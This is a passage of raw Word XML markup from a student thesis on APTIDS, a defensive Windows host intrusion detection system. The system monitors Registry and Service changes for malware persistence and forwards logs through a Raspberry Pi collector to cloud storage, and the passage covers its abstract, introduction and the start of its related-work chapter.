        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00600BA7" w:rsidRDefault="003725C1" w:rsidP="00E445CE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRPr="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE">
      <w:pPr>
        <w:spacing w:line="358" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B89" w:rsidRDefault="00B02E5E" w:rsidP="000C0B89">
      <w:pPr>
        <w:spacing w:line="358" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1"/>
        <w:sectPr w:rsidR="000C0B89" w:rsidSect="00E31F6B">
          <w:headerReference w:type="even" r:id="rId8"/>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="even" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:headerReference w:type="first" r:id="rId12"/>
          <w:footerReference w:type="first" r:id="rId13"/>
          <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
          <w:pgMar w:top="1588" w:right="1134" w:bottom="1871" w:left="1985" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We have developed a </w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve"> behavior analysis </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>solution</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve"> Operation System</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> Advanced Persistent Threat Inspection Detection System</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t>APTIDS</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve">, which is an open </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">source </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>solution combined of a System Monitoring Software, a Dis</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve">tributed Log Collector Hardware, </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>Centralized Log Storage on Cloud</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve"> and a respond tool kit called Sentry</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve">Just like others </w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve">well know open source </w:t>
      </w:r>
      <w:r w:rsidR="00790A80">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>ost IDS,</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve"> the software agent of </w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve">APTIDS has abilities to monitor some common sectors of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> OS like </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>, Service. Furthermore, we have developed an ability to allow A</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve">PTIDS to send collected logs to the </w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>Collector Hardware</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> which is </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>a Log Collector built</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> on a Raspb</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>erry Pi, and from that hardware</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> another collector will push all the collected log to </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> centralized log storage</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve"> on cloud</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>. APTIDS can monitor and alert on its runtime, that means if any malicious activity takes place at where APTIDS is monitoring, APTIDS will capture that activity, write lo</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t>g, and alert to the log storage. When</w:t>
      </w:r>
      <w:r w:rsidR="00E73A17">
        <w:t xml:space="preserve"> any</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve"> incident takes place, </w:t>
      </w:r>
      <w:r w:rsidR="00E73A17">
        <w:t>respond team uses Sentry for analyzing and finding APT source and their persistent executable programs and terminate the threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRPr="00E445CE" w:rsidRDefault="00A94DD6" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc485303703"/>
      <w:r w:rsidRPr="00E445CE">
        <w:lastRenderedPageBreak/>
        <w:t>INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00A94DD6" w:rsidRDefault="00235F8C" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc485303704"/>
      <w:r>
        <w:t>Motivation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="0047771F" w:rsidRDefault="00196A18" w:rsidP="00BE402E">
      <w:r>
        <w:t>Nowadays, with the rapid advance and wide spread of modern threats, computer users are facing threa</w:t>
      </w:r>
      <w:r w:rsidR="0072132A">
        <w:t>ts from everywhere</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0072132A">
        <w:t xml:space="preserve"> From the most complicated malwares those can transform themselves to create many variants, to those that encrypt the whole computer and keep our information as hostage. For fighting back those advanced threats that are terrorizing the Internet, many company have developed antivirus software</w:t>
      </w:r>
      <w:r w:rsidR="00245FA6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0072132A">
        <w:t xml:space="preserve">. To protect the innocent Internet civilians from the cyberwar that are taking place, antivirus softwares come from a free price for basic protection, to some hundred dollars for full protection against most modern attack vectors. </w:t>
      </w:r>
      <w:r w:rsidR="00245FA6">
        <w:t>Personal Antivirus software is very powerful for protecting a normal user from many security threats. But their shortcoming is that they can only protect a sin</w:t>
      </w:r>
      <w:r w:rsidR="0047771F">
        <w:t xml:space="preserve">gle user at one, and if there are more than one user who want to be protected, they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0047771F">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0047771F">
        <w:t xml:space="preserve"> buy more than one AV software, install them separately and there is no way to monitor and manage logs from all those softwares simultaneously. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE4B36" w:rsidRDefault="0032487F" w:rsidP="00BE402E">
      <w:r>
        <w:t>Enterprise Antivirus System</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> come </w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> full qualified</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>protection</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> for big</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> enterprise</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>, campus</w:t>
      </w:r>
      <w:r>
        <w:t>es or companies</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>. They</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> support for monitoring and protecting hundreds</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> users, and manage their logs of activities in some central cloud storage systems. </w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t>However, the price for such</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>platinum protection is</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>very</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> expensive, and </w:t>
      </w:r>
      <w:r>
        <w:t>it is</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> sophisticated for maintaining and operating and especially for protecting small companies or households. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="00BE402E">
      <w:r>
        <w:t xml:space="preserve">From all those shortcomings </w:t>
      </w:r>
      <w:r w:rsidR="00E2646F">
        <w:t>of modern Antivirus Softwares an</w:t>
      </w:r>
      <w:r>
        <w:t>d Security Protection Systems, we want to develop a solution for helping small companies and households to protect themselves against advance threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc485303705"/>
      <w:r>
        <w:t>Thesis’ statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="00990FA2" w:rsidP="00990FA2">
      <w:r>
        <w:t xml:space="preserve">Successfully develop and run APTIDS for monitoring malicious behaviors of software on </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Operating Systems. APTIDS monitor </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and service for detecting softwares that are trying to write the path of their executable files. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRPr="00990FA2" w:rsidRDefault="00990FA2" w:rsidP="00990FA2">
      <w:r>
        <w:t>Testing APTIDS by using some common malwares running in a controllable environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc485303706"/>
      <w:r>
        <w:t>Subject</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00F77A4C" w:rsidRPr="00F77A4C" w:rsidRDefault="00964D71" w:rsidP="00F77A4C">
      <w:r>
        <w:t xml:space="preserve">Research on how malwares store themselves on </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> System for running on start up. In addition, research on how Graylog work</w:t>
      </w:r>
      <w:r w:rsidR="00062D79">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, the method for collector logs and push them to SIEM for storage and analyzing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc485303707"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="004C6A4E" w:rsidRPr="004C6A4E" w:rsidRDefault="004C6A4E" w:rsidP="004C6A4E">
      <w:r>
        <w:t xml:space="preserve">APTIDS can monitor activities in some factions of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003F301F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00A240EA">
        <w:t xml:space="preserve"> the creation and deletion of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Services. Since it has been developed in a </w:t>
      </w:r>
      <w:r w:rsidR="002D356E">
        <w:t>limited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> time, it does not have full features like other</w:t>
      </w:r>
      <w:r w:rsidR="00A240EA">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> well-known antivirus softwares.</w:t>
      </w:r>
      <w:r w:rsidR="002D356E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc485303708"/>
      <w:r>
        <w:t xml:space="preserve">The needs of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> monitoring module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00F9659F" w:rsidRPr="00F9659F" w:rsidRDefault="00F9659F" w:rsidP="00F9659F">
      <w:r>
        <w:t>Malwares usually store th</w:t>
      </w:r>
      <w:r w:rsidR="00095BB2">
        <w:t>e path lead to their executable applications</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00284E83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-755055843"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:instrText xml:space="preserve"> CITATION Registry \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(1)</w:t>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0032487F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in case the system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be restarted, they can run with the start up. Monitoring the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allows us to capture any malicious activity and know what is happening in the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="00C352B0" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc485303709"/>
      <w:r>
        <w:t>The needs of S</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>ervice monitoring module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00F9659F" w:rsidRPr="00F9659F" w:rsidRDefault="00E41963" w:rsidP="00F9659F">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F9659F">
        <w:t xml:space="preserve"> Service allows us to create a so call long-running executable</w:t>
      </w:r>
      <w:r w:rsidR="00095BB2">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="00F9659F">
        <w:t>, which can start automatically at system boot</w:t>
      </w:r>
      <w:r w:rsidR="0032487F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1002975757"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:instrText xml:space="preserve"> CITATION Service \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(2)</w:t>
          </w:r>
          <w:r w:rsidR="00050E57">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F9659F" w:rsidRPr="00C525C7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F9659F">
        <w:t xml:space="preserve"> Knowing that, malicious programs write entries in the Service Control Manager which help them to run their executables when system boot up. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="00C352B0" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc485303710"/>
      <w:r>
        <w:t>The needs of Distributed L</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>g Collector H</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t>ardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="003F301F" w:rsidRPr="003F301F" w:rsidRDefault="003F301F" w:rsidP="003F301F">
      <w:r>
        <w:t xml:space="preserve">The concept of this thesis is aimed to develop a solution for distributed monitoring malicious activities in a </w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>big</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scale network architecture. A distributed log collector hardware plays a role as a local centralize server</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t xml:space="preserve"> for a single LAN network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which receive the log</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>rom agents those</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run in the </w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>LAN</w:t>
      </w:r>
      <w:r>
        <w:t>. Those agent</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, when capt</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>ure any malicious activity, they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> send back their log to the log collector hardware. </w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t>Each collector hardware stores log for a LAN network which can has up to hundreds</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00D92C26">
        <w:t xml:space="preserve"> agents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="003F301F" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc485303711"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t xml:space="preserve">he needs of </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00D92C26" w:rsidRDefault="009D4270" w:rsidP="00D92C26">
      <w:r>
        <w:t>When a single log collector hardware can store log</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for hundreds</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> agents, a </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can store</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> and manage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for hundred</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve">s of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A1547">
        <w:t>log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> collector hardware. Each hardware is managed by an input stream, and can be monitor using a single dashboard. A </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:r w:rsidR="005A1547">
        <w:t xml:space="preserve"> a low us to monitor hundreds of thousands machine in a large network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B0F" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc485303712"/>
      <w:r>
        <w:t>The needs of Forensic Toolkit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="005A1547" w:rsidRDefault="00345B0F" w:rsidP="00345B0F">
      <w:r>
        <w:t xml:space="preserve">In APTIDS, Sentry plays a role as an important step for protecting systems from disastrous incident when APT happens. In the Cyber Space, we have learnt that no system is safe. Any threat and any accident can happen in no delay. Protecting systems by monitoring it 24/7 is not enough, some advanced threats can easily bypass our durable shield and penetrate to compromise the network. When things get into the worst situation, our respond team use Sentry as a Forensic toolkit to identify the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00287BCD">
        <w:t xml:space="preserve"> terminate the threats before they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can spread wider along with their malicious activi</w:t>
      </w:r>
      <w:r w:rsidR="00287BCD">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D4270" w:rsidRPr="00D92C26" w:rsidRDefault="009D4270" w:rsidP="00D92C26"/>
    <w:p w:rsidR="00990FA2" w:rsidRPr="00990FA2" w:rsidRDefault="00990FA2" w:rsidP="00990FA2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B23B2" w:rsidRPr="00E445CE" w:rsidRDefault="008B23B2" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc485303713"/>
      <w:r w:rsidRPr="00E445CE">
        <w:lastRenderedPageBreak/>
        <w:t>BACKGROUND AND RELATED WORKS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidR="006A3B63" w:rsidRPr="00E445CE">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177021" w:rsidRDefault="008B23B2" w:rsidP="008B23B2">
      <w:r>
        <w:t>In this chapter, we study some similar projects those have been developed recently</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t>. This study does not aim to compare the advantages and disadvantages of those projects, but we would like to know how other people around the world</w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t xml:space="preserve"> have</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t xml:space="preserve"> handle</w:t>
      </w:r>
      <w:r w:rsidR="00580A9D">
        <w:t>d nowadays sophisticated</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t xml:space="preserve"> APT threats. T</w:t>
      </w:r>
      <w:r w:rsidR="00C525C7">
        <w:t>his</w:t>
      </w:r>
      <w:r w:rsidR="00177021">
        <w:t xml:space="preserve"> approach has helped us much in developing APTIDS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177021" w:rsidRDefault="00C525C7" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc485303714"/>
      <w:r>
        <w:t>Related works</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00C525C7" w:rsidRDefault="00C525C7" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc485303715"/>
      <w:r>
        <w:t>OSSEC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00C525C7" w:rsidRDefault="00C525C7" w:rsidP="00C525C7">
      <w:r>
        <w:t xml:space="preserve">OSSEC </w:t>
      </w:r>
      <w:r w:rsidR="00FA2604">
        <w:t xml:space="preserve">is a host-based instruction detection system (HIDS) </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="812610974"/>
          <w:citation/>
